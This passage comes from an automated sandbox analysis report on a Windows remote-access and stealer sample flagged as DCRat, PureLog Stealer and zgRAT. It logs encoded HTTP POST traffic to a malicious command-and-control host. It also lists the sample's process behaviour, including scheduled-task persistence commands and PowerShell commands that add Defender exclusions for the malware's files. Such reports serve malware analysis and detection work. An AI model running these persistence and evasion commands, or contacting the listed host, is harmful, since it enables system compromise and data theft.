                                                            Sep 2, 2024 13:35:51.635016918 CEST1028OUTData Raw: 50 56 5f 52 5e 48 59 57 5b 5f 56 5a 57 5c 50 52 55 50 5e 47 50 5b 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PV_R^HYW[_VZW\PRUP^GP[Z\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'[$1:?^7Y'&0-)<=+8 Z$=U((Q>$ ?1]:*%^./]+,
                                                            Sep 2, 2024 13:35:51.926815033 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:52.057172060 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            140192.168.2.64988880.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:51.875073910 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:52.228024006 CEST1340OUTData Raw: 55 53 5a 55 5e 49 59 52 5b 5f 56 5a 57 5f 50 53 55 5d 5e 47 50 53 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: USZU^IYR[_VZW_PSU]^GPSZ^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3!!(+?35'.]<-#;0?**+<T=#>!.%^./]+
                                                            Sep 2, 2024 13:35:52.541008949 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:52.669306993 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0b 23 27 24 0f 25 02 37 07 3d 17 2e 5a 29 3e 24 41 2d 2c 33 00 24 5f 3c 01 28 1c 2a 0e 26 2a 31 13 2b 3c 03 1f 28 31 31 1f 22 34 20 5b 03 1f 25 5a 34 32 32 57 25 06 3d 5a 25 24 2a 14 21 0e 27 05 29 03 00 57 30 03 16 59 23 1f 25 0d 38 2e 22 56 26 06 34 5a 2d 5a 2e 58 31 04 2a 56 08 16 38 1d 2b 02 35 04 22 27 2f 1f 21 2b 22 0f 23 26 27 50 24 20 37 57 27 29 2e 0d 30 3d 27 1c 2a 3e 28 04 33 3a 31 14 20 30 2a 0a 2e 13 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: ##'$%7=.Z)>$A-,3$_<(*&*1+<(11"4 [%Z422W%=Z%$*!')W0Y#%8."V&4Z-Z.X1*V8+5"'/!+"#&'P$ 7W').0='*>(3:1 0*.$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            141192.168.2.64988980.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:52.184747934 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:52.541037083 CEST1028OUTData Raw: 55 52 5f 55 5e 41 59 55 5b 5f 56 5a 57 5c 50 58 55 59 5e 46 50 5d 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UR_U^AYU[_VZW\PXUY^FP]ZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'W2<8$%"['>_? [;$<'=S+;#('4>1):%^./]+,
                                                            Sep 2, 2024 13:35:52.836296082 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:53.056766987 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:52 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            142192.168.2.64989080.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:53.199646950 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:53.556143045 CEST1028OUTData Raw: 55 5f 5f 55 5e 47 5c 56 5b 5f 56 5a 57 58 50 58 55 5e 5e 46 50 58 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U__U^G\V[_VZWXPXU^^FPXZ\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3!=X?$'"'.*^>. /44Z3)< Q=44)W).*%^./]+<
                                                            Sep 2, 2024 13:35:53.848170996 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:53.973728895 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:07:33:12
                                                            Start date:02/09/2024
                                                            Path:C:\Users\user\Desktop\active key.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\active key.exe"
                                                            Imagebase:0x7ff6e9520000
                                                            File size:4'691'456 bytes
                                                            MD5 hash:608DE9B0CD5EC54B879965FDDBBB9DB6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:1
                                                            Start time:07:33:12
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:07:33:13
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c mode con cols=55 lines=15
                                                            Imagebase:0x7ff7b51f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:07:33:13
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\mode.com
                                                            Wow64 process (32bit):false
                                                            Commandline:mode con cols=55 lines=15
                                                            Imagebase:0x7ff615810000
                                                            File size:33'280 bytes
                                                            MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:07:33:14
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\ntoskrnl2.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\ntoskrnl2.exe"
                                                            Imagebase:0x550000
                                                            File size:1'430'164 bytes
                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2321413390.00000000128BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.2321413390.00000000128BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000005.00000002.2347592089.000000001B180000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.2347592089.000000001B180000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 88%, ReversingLabs
                                                            • Detection: 75%, Virustotal, Browse
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:07:33:14
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
                                                            Imagebase:0x7ff7b51f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:07:33:14
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\certutil.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5
                                                            Imagebase:0x7ff770570000
                                                            File size:1'651'712 bytes
                                                            MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:07:33:14
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\find.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:find /i /v "md5"
                                                            Imagebase:0x7ff689990000
                                                            File size:17'920 bytes
                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:07:33:14
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\find.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:find /i /v "certutil"
                                                            Imagebase:0x7ff689990000
                                                            File size:17'920 bytes
                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 6 /tr "'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:19
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 8 /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:20
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDv" /sc ONLOGON /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:21
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 9 /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:22
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:23
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:24
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:25
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "ntoskrnl2n" /sc MINUTE /mo 9 /tr "'C:\Windows\System32\ntoskrnl2.exe'" /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:26
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "ntoskrnl2" /sc ONLOGON /tr "'C:\Windows\System32\ntoskrnl2.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff66e660000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:27
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "ntoskrnl2n" /sc MINUTE /mo 5 /tr "'C:\Windows\System32\ntoskrnl2.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:28
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:29
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\tracing\fontdrvhost.exe'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:30
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:32
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:33
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:34
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:35
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:36
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\backgroundTaskHost.exe'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:37
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\ntoskrnl2.exe'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:38
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:39
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:41
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:42
                                                            Start time:07:33:19
                                                            Start date:02/09/2024
                                                            Path:C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe"
                                                            Imagebase:0xed0000
                                                            File size:1'430'164 bytes
                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 88%, ReversingLabs
                                                            • Detection: 75%, Virustotal, Browse
                                                            Has exited:true

                                                            General

                                                            Target ID:43
                                                            Start time:07:33:19
                                                            Start date:02/09/2024
                                                            Path:C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe"
                                                            Imagebase:0x5a0000
                                                            File size:1'430'164 bytes
                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:44
                                                            Start time:07:33:19
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rtOHKAESQQ.bat"
                                                            Imagebase:0x7ff7b51f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:45
                                                            Start time:07:33:19
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:46
                                                            Start time:07:33:20
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\ntoskrnl2.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\ntoskrnl2.exe
                                                            Imagebase:0xc10000
                                                            File size:1'430'164 bytes
                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:47
